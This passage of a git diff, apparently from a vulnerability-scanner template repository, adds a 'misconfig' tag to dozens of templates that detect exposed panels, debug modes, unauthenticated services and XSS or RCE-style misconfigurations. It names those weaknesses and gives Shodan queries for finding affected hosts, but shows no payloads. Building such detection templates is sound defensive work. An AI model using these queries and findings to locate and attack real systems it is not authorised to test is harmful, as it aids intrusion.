b/http/misconfiguration/aem/aem-login-status.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 3 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe + tags: aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml index 3b045574b5..bee5558021 100644 --- a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml +++ b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml index 3910d86c30..dd214075fb 100644 --- a/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml index 01de38d0bd..1f47753d65 100644 --- a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 4 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml index e38378bea1..bf4a37db57 100644 --- a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 8 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe + tags: aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-setpreferences-xss.yaml b/http/misconfiguration/aem/aem-setpreferences-xss.yaml index bbb19fc79a..84bc4968af 100644 --- a/http/misconfiguration/aem/aem-setpreferences-xss.yaml +++ b/http/misconfiguration/aem/aem-setpreferences-xss.yaml @@ -16,7 +16,7 @@ info: metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,xss + tags: aem,xss,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-userinfo-servlet.yaml b/http/misconfiguration/aem/aem-userinfo-servlet.yaml index 3f5d7ec5aa..479715cbe0 100644 --- a/http/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/http/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,bruteforce + tags: aem,bruteforce,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml index ae5b2bcf20..b2c844c352 100644 --- a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml +++ b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-xss-childlist-selector.yaml b/http/misconfiguration/aem/aem-xss-childlist-selector.yaml index dfe83f7ef8..9e41e8f418 100644 --- a/http/misconfiguration/aem/aem-xss-childlist-selector.yaml +++ b/http/misconfiguration/aem/aem-xss-childlist-selector.yaml @@ -18,7 +18,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,aem,adobe + tags: xss,aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/airflow/airflow-debug.yaml b/http/misconfiguration/airflow/airflow-debug.yaml index e4d88616ff..c358cddb3d 100644 --- a/http/misconfiguration/airflow/airflow-debug.yaml +++ b/http/misconfiguration/airflow/airflow-debug.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,fpd + tags: apache,airflow,fpd,misconfig http: - method: GET diff --git a/http/misconfiguration/airflow/unauthenticated-airflow.yaml b/http/misconfiguration/airflow/unauthenticated-airflow.yaml index abeec2b1ef..912f9839d8 100644 --- a/http/misconfiguration/airflow/unauthenticated-airflow.yaml +++ b/http/misconfiguration/airflow/unauthenticated-airflow.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 2 shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth + tags: apache,airflow,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/akamai/akamai-arl-xss.yaml b/http/misconfiguration/akamai/akamai-arl-xss.yaml index 7a1059b150..ca6e5d1830 100644 --- a/http/misconfiguration/akamai/akamai-arl-xss.yaml +++ b/http/misconfiguration/akamai/akamai-arl-xss.yaml @@ -15,7 +15,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: akamai,xss + tags: akamai,xss,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml index 07ee7cafdb..4cfceb31ac 100644 --- a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml +++ b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 204 verified: true - tags: cache,poisoning,generic,xss,akamai,s3 + tags: cache,poisoning,generic,xss,akamai,s3,misconfig variables: rand: "{{rand_base(5)}}" diff --git a/http/misconfiguration/alibaba-mongoshake-unauth.yaml b/http/misconfiguration/alibaba-mongoshake-unauth.yaml index 6fda18783c..be12a07eec 100644 --- a/http/misconfiguration/alibaba-mongoshake-unauth.yaml +++ b/http/misconfiguration/alibaba-mongoshake-unauth.yaml @@ -4,7 +4,7 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth,alibaba + tags: mongoshake,unauth,alibaba,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/android-debug-database-exposed.yaml b/http/misconfiguration/android-debug-database-exposed.yaml index de94ca3ddc..9c82f59f5b 100644 --- a/http/misconfiguration/android-debug-database-exposed.yaml +++ b/http/misconfiguration/android-debug-database-exposed.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Android Debug Database" - tags: unauth,android + tags: unauth,android,misconfig http: - method: GET diff --git a/http/misconfiguration/apache/tomcat-pathnormalization.yaml b/http/misconfiguration/apache/tomcat-pathnormalization.yaml index 4909cfea93..50e48010cc 100644 --- a/http/misconfiguration/apache/tomcat-pathnormalization.yaml +++ b/http/misconfiguration/apache/tomcat-pathnormalization.yaml @@ -10,7 +10,7 @@ info: cvss-score: 0.0 cwe-id: CWE-200 reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - tags: panel,tomcat,apache + tags: panel,tomcat,apache,misconfig metadata: max-request: 6 diff --git a/http/misconfiguration/apc-info.yaml b/http/misconfiguration/apc-info.yaml index d832c9d1b2..0813cc01f1 100644 --- a/http/misconfiguration/apc-info.yaml +++ b/http/misconfiguration/apc-info.yaml @@ -4,7 +4,7 @@ info: name: APCu service information leakage author: koti2 severity: low - tags: config,service,apcu + tags: config,service,apcu,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/artifactory-anonymous-deploy.yaml b/http/misconfiguration/artifactory-anonymous-deploy.yaml index c3ee7408d2..741cb217f2 100644 --- a/http/misconfiguration/artifactory-anonymous-deploy.yaml +++ b/http/misconfiguration/artifactory-anonymous-deploy.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://www.errno.fr/artifactory/Attacking_Artifactory.html - tags: artifactory + tags: artifactory,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/aspx-debug-mode.yaml b/http/misconfiguration/aspx-debug-mode.yaml index b47a4852ee..70e7f1c8fa 100644 --- a/http/misconfiguration/aspx-debug-mode.yaml +++ b/http/misconfiguration/aspx-debug-mode.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled - tags: debug + tags: debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/aws-redirect.yaml b/http/misconfiguration/aws-redirect.yaml index 1520d7ee95..2e5eb32973 100644 --- a/http/misconfiguration/aws-redirect.yaml +++ b/http/misconfiguration/aws-redirect.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://link.medium.com/fgXKJHR9P7 - tags: aws,takeover + tags: aws,takeover,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/blackbox-exporter-metrics.yaml b/http/misconfiguration/blackbox-exporter-metrics.yaml index 08facccbc4..ebeb32639e 100644 --- a/http/misconfiguration/blackbox-exporter-metrics.yaml +++ b/http/misconfiguration/blackbox-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Blackbox Exporter" - tags: blackbox,exposure,debug + tags: blackbox,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/browserless-debugger.yaml b/http/misconfiguration/browserless-debugger.yaml index d3e7f54a0f..45dd151d83 100644 --- a/http/misconfiguration/browserless-debugger.yaml +++ b/http/misconfiguration/browserless-debugger.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"browserless debugger" - tags: browserless,unauth,debug + tags: browserless,unauth,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/cgi-test-page.yaml b/http/misconfiguration/cgi-test-page.yaml index 7193d1cfb1..057963450b 100644 --- a/http/misconfiguration/cgi-test-page.yaml +++ b/http/misconfiguration/cgi-test-page.yaml @@ -4,7 +4,7 @@ info: name: CGI Test page author: YASH ANAND @yashanand155 severity: info - tags: cgi + tags: cgi,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/clockwork-dashboard-exposure.yaml b/http/misconfiguration/clockwork-dashboard-exposure.yaml index 402f6bc4ac..e920d4ecb8 100644 --- a/http/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/http/misconfiguration/clockwork-dashboard-exposure.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json - tags: exposure,unauth + tags: exposure,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/cluster-panel.yaml b/http/misconfiguration/cluster-panel.yaml index 22170a3909..f9b3b042e7 100644 --- a/http/misconfiguration/cluster-panel.yaml +++ b/http/misconfiguration/cluster-panel.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Cluster Overview - Trino" - tags: cluster,unauth,trino + tags: cluster,unauth,trino,misconfig http: - method: POST diff --git a/http/misconfiguration/collectd-exporter-metrics.yaml b/http/misconfiguration/collectd-exporter-metrics.yaml index 9135317f25..499911533b 100644 --- a/http/misconfiguration/collectd-exporter-metrics.yaml +++ b/http/misconfiguration/collectd-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Collectd Exporter" - tags: collectd,exposure,debug + tags: collectd,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/command-api-explorer.yaml b/http/misconfiguration/command-api-explorer.yaml index 6cbbb0649c..b36d832462 100644 --- a/http/misconfiguration/command-api-explorer.yaml +++ b/http/misconfiguration/command-api-explorer.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Command API Explorer" - tags: panel + tags: panel,misconfig http: - method: GET diff --git a/http/misconfiguration/cx-cloud-upload-detect.yaml b/http/misconfiguration/cx-cloud-upload-detect.yaml index 081c0125fd..527294457c 100644 --- a/http/misconfiguration/cx-cloud-upload-detect.yaml +++ b/http/misconfiguration/cx-cloud-upload-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: fileupload + tags: fileupload,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/d-link-arbitary-fileread.yaml b/http/misconfiguration/d-link-arbitary-fileread.yaml index fd0fe637f7..94042e2233 100644 --- a/http/misconfiguration/d-link-arbitary-fileread.yaml +++ b/http/misconfiguration/d-link-arbitary-fileread.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: dlink,lfi + tags: dlink,lfi,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/debug/bottle-debug.yaml b/http/misconfiguration/debug/bottle-debug.yaml index 0574888a20..9395cd343d 100644 --- a/http/misconfiguration/debug/bottle-debug.yaml +++ b/http/misconfiguration/debug/bottle-debug.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"Sorry, the requested URL" - tags: bottle,exposure,debug + tags: bottle,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/debug/flask-werkzeug-debug.yaml b/http/misconfiguration/debug/flask-werkzeug-debug.yaml index a2eac45b7d..2c939b53ab 100644 --- a/http/misconfiguration/debug/flask-werkzeug-debug.yaml +++ b/http/misconfiguration/debug/flask-werkzeug-debug.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Werkzeug powered traceback interpreter" - tags: werkzeug,exposure,debug + tags: werkzeug,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/deos-openview-admin.yaml b/http/misconfiguration/deos-openview-admin.yaml index 74ab263d67..6d905b255b 100644 --- a/http/misconfiguration/deos-openview-admin.yaml +++ b/http/misconfiguration/deos-openview-admin.yaml @@ -10,7 +10,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-284 - tags: openview,disclosure,panel + tags: openview,disclosure,panel,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/dgraph-dashboard-exposure.yaml b/http/misconfiguration/dgraph-dashboard-exposure.yaml index 5ac3622841..cef5ec1226 100644 --- a/http/misconfiguration/dgraph-dashboard-exposure.yaml +++ b/http/misconfiguration/dgraph-dashboard-exposure.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Dgraph Ratel Dashboard" - tags: exposure,unauth,panel + tags: exposure,unauth,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/django-debug-detect.yaml b/http/misconfiguration/django-debug-detect.yaml index f9d7052e6d..5d1a6e29c5 100644 --- a/http/misconfiguration/django-debug-detect.yaml +++ b/http/misconfiguration/django-debug-detect.yaml @@ -4,7 +4,7 @@ info: name: Django Debug Method Enabled author: dhiyaneshDK,hackergautam severity: medium - tags: django,debug + tags: django,debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/druid-monitor.yaml b/http/misconfiguration/druid-monitor.yaml index 52ca2252e0..44fe11b5b3 100644 --- a/http/misconfiguration/druid-monitor.yaml +++ b/http/misconfiguration/druid-monitor.yaml @@ -4,7 +4,7 @@ info: name: Druid Monitor Unauthorized Access author: ohlinge severity: high - tags: druid,unauth + tags: druid,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml index 097980ca0f..d8e7f68c75 100644 --- a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml +++ b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 4 shodan-query: http.component:"drupal" - tags: drupal + tags: drupal,misconfig http: - method: GET diff --git a/http/misconfiguration/dynamic-container-host.yaml b/http/misconfiguration/dynamic-container-host.yaml index 0c15143040..9aa0efa2e5 100644 --- a/http/misconfiguration/dynamic-container-host.yaml +++ b/http/misconfiguration/dynamic-container-host.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dynamics Container Host" - tags: exposure,dynamic,container + tags: exposure,dynamic,container,misconfig http: - method: GET diff --git a/http/misconfiguration/elasticsearch.yaml b/http/misconfiguration/elasticsearch.yaml index 9ff60652b9..8348ba6b27 100644 --- a/http/misconfiguration/elasticsearch.yaml +++ b/http/misconfiguration/elasticsearch.yaml @@ -8,7 +8,7 @@ info: max-request: 4 verified: true shodan-query: "ElasticSearch" - tags: elastic,unauth,elasticsearch + tags: elastic,unauth,elasticsearch,misconfig http: - method: GET diff --git a/http/misconfiguration/everything-listing.yaml b/http/misconfiguration/everything-listing.yaml index 1aabbb6c3a..a2850b27d0 100644 --- a/http/misconfiguration/everything-listing.yaml +++ b/http/misconfiguration/everything-listing.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: 'true' shodan-query: http.favicon.hash:-977323269 - tags: exposure,everything,listing,voidtools + tags: exposure,everything,listing,voidtools,misconfig http: - method: GET diff --git a/http/misconfiguration/exposed-docker-api.yaml b/http/misconfiguration/exposed-docker-api.yaml index 68f54725b4..c39bad0fe9 100644 --- a/http/misconfiguration/exposed-docker-api.yaml +++ b/http/misconfiguration/exposed-docker-api.yaml @@ -4,7 +4,7 @@ info: name: Exposed Docker API author: furkansenan,dwisiswant0 severity: info - tags: docker,unauth,devops + tags: docker,unauth,devops,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/exposed-jquery-file-upload.yaml b/http/misconfiguration/exposed-jquery-file-upload.yaml index e362fde4da..01fb075db6 100644 --- a/http/misconfiguration/exposed-jquery-file-upload.yaml +++ b/http/misconfiguration/exposed-jquery-file-upload.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-434 - tags: exposure,jquery,edb + tags: exposure,jquery,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/exposed-kibana.yaml b/http/misconfiguration/exposed-kibana.yaml index 30828dd4dd..603e53f73e 100644 --- a/http/misconfiguration/exposed-kibana.yaml +++ b/http/misconfiguration/exposed-kibana.yaml @@ -4,7 +4,7 @@ info: name: Exposed Kibana author: Shine severity: medium - tags: kibana,unauth + tags: kibana,unauth,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/git-web-interface.yaml b/http/misconfiguration/git-web-interface.yaml index 9934fa8b2e..39f620ad75 100644 --- a/http/misconfiguration/git-web-interface.yaml +++ b/http/misconfiguration/git-web-interface.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: html:"git web interface version" - tags: git + tags: git,misconfig http: - method: GET diff --git a/http/misconfiguration/grafana-public-signup.yaml b/http/misconfiguration/grafana-public-signup.yaml index 825e2e6afc..b8632e8f1c 100644 --- a/http/misconfiguration/grafana-public-signup.yaml +++ b/http/misconfiguration/grafana-public-signup.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Grafana" - tags: grafana,intrusive + tags: grafana,intrusive,misconfig http: - raw: diff --git a/http/misconfiguration/graphql/graphql-alias-batching.yaml b/http/misconfiguration/graphql/graphql-alias-batching.yaml index 1200686f9a..d4a9d59006 100644 --- a/http/misconfiguration/graphql/graphql-alias-batching.yaml +++ b/http/misconfiguration/graphql/graphql-alias-batching.yaml @@ -14,7 +14,7 @@ info: - https://stackoverflow.com/questions/62421352/graphql-difference-between-using-alias-versus-multiple-query-objects-when-doin remediation: | Limit queries aliasing in your GraphQL Engine to ensure mitigation of aliasing-based attacks. - tags: graphql + tags: graphql,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/graphql/graphql-array-batching.yaml b/http/misconfiguration/graphql/graphql-array-batching.yaml index 41a4172586..77916bf92b 100644 --- a/http/misconfiguration/graphql/graphql-array-batching.yaml +++ b/http/misconfiguration/graphql/graphql-array-batching.yaml @@ -13,7 +13,7 @@ info: - https://graphql.security/ remediation: | Deactivate or limit Batching in your GraphQL engine. - tags: graphql + tags: graphql,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/graphql/graphql-field-suggestion.yaml b/http/misconfiguration/graphql/graphql-field-suggestion.yaml index 2dee50b0d2..f87901f0ee 100644 --- a/http/misconfiguration/graphql/graphql-field-suggestion.yaml +++ b/http/misconfiguration/graphql/graphql-field-suggestion.yaml @@ -13,7 +13,7 @@ info: - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - https://graphql.security - tags: graphql + tags: graphql,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/graphql/graphql-get-method.yaml b/http/misconfiguration/graphql/graphql-get-method.yaml index 6da3f76f68..fc02bf4c64 100644 --- a/http/misconfiguration/graphql/graphql-get-method.yaml +++ b/http/misconfiguration/graphql/graphql-get-method.yaml @@ -12,7 +12,7 @@ info: - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - https://graphql.security/ - tags: graphql + tags: graphql,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml index 92f9f5007b..4d42d37375 100644 --- a/http/misconfiguration/grav-register-admin.yaml +++ b/http/misconfiguration/grav-register-admin.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Grav Register Admin User" - tags: grav,register,admin + tags: grav,register,admin,misconfig http: - method: GET diff --git a/http/misconfiguration/hadoop-unauth-rce.yaml b/http/misconfiguration/hadoop-unauth-rce.yaml index d3de67ca0e..8cd98fa234 100644 --- a/http/misconfiguration/hadoop-unauth-rce.yaml +++ b/http/misconfiguration/hadoop-unauth-rce.yaml @@ -15,7 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-306 - tags: vulhub,apache,hadoop,unauth,rce,msf + tags: vulhub,apache,hadoop,unauth,rce,msf,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml index 70de63bbac..9e34eccc31 100644 --- a/http/misconfiguration/haproxy-exporter-metrics.yaml +++ b/http/misconfiguration/haproxy-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"haproxy exporter" - tags: haproxy,exposure,debug + tags: haproxy,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/haproxy-status.yaml b/http/misconfiguration/haproxy-status.yaml index 349ed783eb..e622e5b989 100644 --- a/http/misconfiguration/haproxy-status.yaml +++ b/http/misconfiguration/haproxy-status.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: logs,haproxy,edb + tags: logs,haproxy,edb,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/hp/unauthorized-hp-printer.yaml b/http/misconfiguration/hp/unauthorized-hp-printer.yaml index bc9f62bcac..917bd960d3 100644 --- a/http/misconfiguration/hp/unauthorized-hp-printer.yaml +++ b/http/misconfiguration/hp/unauthorized-hp-printer.yaml @@ -4,7 +4,7 @@ info: name: Unauthorized HP Printer author: pussycat0x severity: high - tags: hp,iot,unauth + tags: hp,iot,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/hp/unauthorized-printer-hp.yaml b/http/misconfiguration/hp/unauthorized-printer-hp.yaml index e06a6b0b29..86633efd7a 100644 --- a/http/misconfiguration/hp/unauthorized-printer-hp.yaml +++ b/http/misconfiguration/hp/unauthorized-printer-hp.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"Hp Officejet pro" - tags: hp,iot,unauth + tags: hp,iot,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/hpe-system-management-anonymous.yaml b/http/misconfiguration/hpe-system-management-anonymous.yaml index 31c1ab9f34..7beaed5ce1 100644 --- a/http/misconfiguration/hpe-system-management-anonymous.yaml +++ b/http/misconfiguration/hpe-system-management-anonymous.yaml @@ -4,7 +4,7 @@ info: name: HPE System Management Anonymous Access author: divya_mudgal severity: low - tags: hp,unauth + tags: hp,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/ibm-friendly-path-exposure.yaml b/http/misconfiguration/ibm-friendly-path-exposure.yaml index e8a0d36430..60a408ba10 100644 --- a/http/misconfiguration/ibm-friendly-path-exposure.yaml +++ b/http/misconfiguration/ibm-friendly-path-exposure.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 5 shodan-query: http.html:"IBM WebSphere Portal" - tags: ibm,exposure,websphere + tags: ibm,exposure,websphere,misconfig http: - method: GET diff --git a/http/misconfiguration/ibm-websphere-xml.yaml b/http/misconfiguration/ibm-websphere-xml.yaml index 32b7711d41..1dca452728 100644 --- a/http/misconfiguration/ibm-websphere-xml.yaml +++ b/http/misconfiguration/ibm-websphere-xml.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 verified: true - tags: ibm,websphere,exposure + tags: ibm,websphere,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/avideo-install.yaml b/http/misconfiguration/installer/avideo-install.yaml index 742b40bd98..9eaed6424b 100644 --- a/http/misconfiguration/installer/avideo-install.yaml +++ b/http/misconfiguration/installer/avideo-install.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.title:"AVideo" fofa-query: "AVideo" - tags: panel,install,avideo + tags: panel,install,avideo,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/circarlife-setup.yaml b/http/misconfiguration/installer/circarlife-setup.yaml index 209b17ed52..c867aede4c 100644 --- a/http/misconfiguration/installer/circarlife-setup.yaml +++ b/http/misconfiguration/installer/circarlife-setup.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"- setup" html:"Modem setup" - tags: scada,circontrol,circarlife,setup,exposure,panel,installer + tags: scada,circontrol,circarlife,setup,exposure,panel,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/getsimple-installation.yaml b/http/misconfiguration/installer/getsimple-installation.yaml index a34c6f4044..ba766a1e3c 100644 --- a/http/misconfiguration/installer/getsimple-installation.yaml +++ b/http/misconfiguration/installer/getsimple-installation.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-284 reference: - http://get-simple.info/ - tags: getsimple,exposure,installer + tags: getsimple,exposure,installer,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/installer/magnolia-installer.yaml b/http/misconfiguration/installer/magnolia-installer.yaml index 2df455cf73..0b5a4315ca 100644 --- a/http/misconfiguration/installer/magnolia-installer.yaml +++ b/http/misconfiguration/installer/magnolia-installer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Magnolia Installation" - tags: magnolia,exposure,installer + tags: magnolia,exposure,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/mcloud-installer.yaml b/http/misconfiguration/installer/mcloud-installer.yaml index 3be5d1de66..376263daad 100644 --- a/http/misconfiguration/installer/mcloud-installer.yaml +++ b/http/misconfiguration/installer/mcloud-installer.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"mcloud-installer-web" - tags: panel,mcloud,exposure + tags: panel,mcloud,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/openshift-installer-panel.yaml b/http/misconfiguration/installer/openshift-installer-panel.yaml index 2c79773b0f..3b035b14bf 100644 --- a/http/misconfiguration/installer/openshift-installer-panel.yaml +++ b/http/misconfiguration/installer/openshift-installer-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"OpenShift Assisted Installer" - tags: panel,openshift,cluster + tags: panel,openshift,cluster,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/spip-install.yaml b/http/misconfiguration/installer/spip-install.yaml index 4c04ea72fe..c68f7bff74 100644 --- a/http/misconfiguration/installer/spip-install.yaml +++ b/http/misconfiguration/installer/spip-install.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 verified: "true" - tags: exposure,spip,install + tags: exposure,spip,install,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/wp-install.yaml b/http/misconfiguration/installer/wp-install.yaml index 8bbbc59d4a..20587270ab 100644 --- a/http/misconfiguration/installer/wp-install.yaml +++ b/http/misconfiguration/installer/wp-install.yaml @@ -12,7 +12,7 @@ info: reference: - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ - https://twitter.com/0xPugazh/status/1610315762392268802 - tags: panel,wordpress + tags: misconfig,panel,wordpress metadata: max-request: 1 diff --git a/http/misconfiguration/java-melody-exposed.yaml b/http/misconfiguration/java-melody-exposed.yaml index ace10f04ff..04f67db7f0 100644 --- a/http/misconfiguration/java-melody-exposed.yaml +++ b/http/misconfiguration/java-melody-exposed.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security - tags: 